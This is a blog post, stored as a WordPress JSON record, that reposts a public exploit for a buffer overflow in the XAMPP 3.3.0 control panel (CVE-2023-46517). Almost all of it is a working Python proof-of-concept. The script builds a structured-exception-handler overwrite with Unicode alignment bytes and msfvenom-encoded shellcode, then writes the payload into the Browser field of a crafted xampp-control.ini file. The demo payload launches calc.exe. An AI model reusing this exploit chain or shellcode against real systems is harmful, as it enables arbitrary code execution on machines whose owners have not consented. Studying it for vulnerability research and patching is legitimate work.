{"id":50660,"date":"2023-10-27T17:12:46","date_gmt":"2023-10-27T14:12:46","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/175381\/xampp330-overflow.txt"},"modified":"2023-10-31T08:55:32","modified_gmt":"2023-10-31T05:25:32","slug":"xampp-3-3-0-buffer-overflow","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/xampp-3-3-0-buffer-overflow\/","title":{"rendered":"XAMPP 3.3.0 Buffer Overflow"},"content":{"rendered":"

# Exploit Title: XAMPP v3.3.0 \u2014 ‘.ini’ Buffer Overflow (Unicode + SEH)
\n# Date: 2023-10-26
\n# Author: Talson (@Ripp3rdoc)
\n# Software Link: https:\/\/sourceforge.net\/projects\/xampp\/files\/XAMPP%20Windows\/8.0.28\/xampp-windows-x64-8.0.28-0-VS16-installer.exe
\n# Version: 3.3.0
\n# Tested on: Windows 11
\n# CVE-2023-46517<\/p>\n

##########################################################
\n# _________ _______ _ _______ _______ _ #
\n# \\__ __\/( ___ )( \\ ( ____ \\( ___ )( ( \/| #
\n# ) ( | ( ) || ( | ( \\\/| ( ) || \\ ( | #
\n# | | | (___) || | | (_____ | | | || \\ | | #
\n# | | | ___ || | (_____ )| | | || (\\ \\) | #
\n# | | | ( ) || | ) || | | || | \\ | #
\n# | | | ) ( || (____\/\\\/\\____) || (___) || ) \\ | #
\n# )_( |\/ \\|(_______\/\\_______)(_______)|\/ )_) #
\n# #
\n##########################################################<\/p>\n

# Proof of Concept:<\/p>\n

# 1.- Run the python script “poc.py”, it will create a new file “xampp-control.ini”
\n# 2.- Open the application (xampp-control.exe)
\n# 3.- Click on the “admin” button in front of Apache service.
\n# 4.- Profit<\/p>\n

# Proof-of-Concept code on GitHub: https:\/\/github.com\/ripp3rdoc\/XAMPPv3.3.0-BOF\/<\/p>\n

# Greetingz to EMU TEAM (\u00ac\u203f\u00ac)\u2a59<\/p>\n

from pwn import *
\nimport shutil
\nimport os.path<\/p>\n

buffer = “\\x41” * 268 # 268 bytes to fill the buffer
\nnseh = “\\x59\\x71” # next SEH address \u2014 0x00590071 (a harmless padding)
\nseh = “\\x15\\x43” # SEH handler \u2014 0x00430015: pop ecx ; pop ebp ; ret ;
\npadd = “\\x71” * 0x55 # padding<\/p>\n

eax_align = “\\x47” # venetian pad\/align
\neax_align += “\\x51” # push ecx
\neax_align += “\\x71” # venetian pad\/align
\neax_align += “\\x58” # pop eax -> eax = 0019e1a0
\neax_align += “\\x71” # venetian pad\/align
\neax_align += “\\x05\\x24\\x11” # add eax,0x11002300
\neax_align += “\\x71” # venetian pad\/align
\neax_align += “\\x2d\\x11\\x11” # sub eax,0x11001100 -> eax = 0019F3DC
\neax_align += “\\x71” # venetian pad\/align
\neax_align += “\\x50” # push eax
\neax_align += “\\x71” # pad to align the following ret
\neax_align += “\\xc3”; # ret into eax?<\/p>\n

# msfvenom -p windows\/exec CMD=calc.exe -e x86\/unicode_mixed -f raw EXITFUNC=thread BufferRegister=EAX -o shellcode.bin
\n# Payload size: 512 bytes
\nshellcode = (
\n“PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1”
\n“AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBkLzHrbM0ipm0c0bi7u01Ep1TBkb0nPdKR2zlrknrKdDK42Kx”
\n“Jo6WpJnFLqiofLMl1QallBLlO0gQxOzmjagW7rZRObpWBkNrZpdKMzmlBkNlzq1hZC0HKQwab1dKQIKp9qiCrk”
\n“myKhGslzoYtKMdTKkQJ6ma9odlgQ8OJmM1vg08iPD5yfjcSMjXOKQmnDRUhdaH4KR8mTIq7c2FDKjlpKrkaHML”
\n“JaZ3dKItrkYqhPU9MtO4KtOk1KC1QI1JNqKO9P1OOoqJtKn2HkRmOmaZjatMbe7BYpm0kPR0PhmadKRODGioj57”
\n“KgpmMnJZjoxDfceemCmYo9EmlivcL9zE0ikWpQe9ugKoWKcprpo2Jip23KOHUQSaQ0l33Lns5PxrEKPAA”
\n)<\/p>\n

shellcode = buffer + nseh + seh + eax_align + padd + shellcode<\/p>\n

check_file = os.path.isfile(“c:\\\\xampp\\\\xampp-control.ini”)<\/p>\n

if check_file:<\/p>\n

print(“[!] Backup file found. Generating the POC file…”)
\npass
\nelse:
\n# create backup
\ntry:
\nshutil.copyfile(“c:\\\\xampp\\\\xampp-control.ini”, “c:\\\\xampp\\\\xampp-control.ini.bak”)
\nprint(“[+] Creating backup for xampp-control.ini…”)
\nprint(“[+] Backup file created!”)
\nexcept Exception as e:
\nprint(“[!] Failed creating a backup for xampp-control.ini: “, e)<\/p>\n

try:<\/p>\n

# Create the new file
\nwith open(“c:\\\\xampp\\\\xampp-control.ini”, “w”, encoding=’utf-8′) as file:
\nfile.write(f”””[Common]\nEdition=
\nEditor=
\nBrowser={shellcode}<\/p>\n

Debug=0
\nDebuglevel=0
\nLanguage=en
\nTomcatVisible=1
\nMinimized=0<\/p>\n[LogSettings]\nFont=Arial
\nFontSize=10<\/p>\n[WindowSettings]\nLeft=-1
\nTop=-1
\nWidth=682
\nHeight=441<\/p>\n[Autostart]\nApache=0
\nMySQL=0
\nFileZilla=0
\nMercury=0
\nTomcat=0<\/p>\n[Checks]\nCheckRuntimes=1
\nCheckDefaultPorts=1<\/p>\n[ModuleNames]\nApache=Apache
\nMySQL=MySQL
\nMercury=Mercury
\nTomcat=Tomcat<\/p>\n[EnableModules]\nApache=1
\nMySQL=1
\nFileZilla=1
\nMercury=1
\nTomcat=1<\/p>\n[EnableServices]\nApache=1
\nMySQL=1
\nFileZilla=1
\nTomcat=1<\/p>\n[BinaryNames]\nApache=httpd.exe
\nMySQL=mysqld.exe
\nFileZilla=filezillaserver.exe
\nFileZillaAdmin=filezilla server interface.exe
\nMercury=mercury.exe
\nTomcat=tomcat8.exe<\/p>\n[ServiceNames]\nApache=Apache2.4
\nMySQL=mysql
\nFileZilla=FileZillaServer
\nTomcat=Tomcat
\n[ServicePorts]\nApache=80
\nApacheSSL=443
\nMySQL=3306
\nFileZilla=21
\nFileZill=14147
\nMercury1=25
\nMercury2=79
\nMercury3=105
\nMercury4=106
\nMercury5=110
\nMercury6=143
\nMercury7=2224
\nTomcatHTTP=8080
\nTomcatAJP=8009
\nTomcat=8005
\n[UserConfigs]\nApache=
\nMySQL=
\nFileZilla=
\nMercury=
\nTomcat=<\/p>\n[UserLogs]\nApache=
\nMySQL=
\nFileZilla=
\nMercury=
\nTomcat=
\n“””)
\nprint(“[+] Created the POC!”)<\/p>\n

except Exception as e:
\nprint(“[!] Failed creating the POC xampp-control.ini: “, e)<\/p>\n","protected":false},"excerpt":{"rendered":"

# Exploit Title: XAMPP v3.3.0 \u2014 ‘.ini’ Buffer Overflow (Unicode + SEH) # Date: 2023-10-26 # Author: Talson (@Ripp3rdoc) # Software Link: https:\/\/sourceforge.net\/projects\/xampp\/files\/XAMPP%20Windows\/8.0.28\/xampp-windows-x64-8.0.28-0-VS16-installer.exe # Version: 3.3.0 # Tested on: Windows 11 # CVE-2023-46517 ########################################################## # _________ _______ _ _______ _______ _ # # \\__ __\/( ___ )( \\ ( ____ \\( ___ )( ( \/| …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-50660","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/50660","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=50660"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/50660\/revisions"}],"predecessor-version":[{"id":50763,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/50660\/revisions\/50763"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=50660"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=50660"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=50660"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}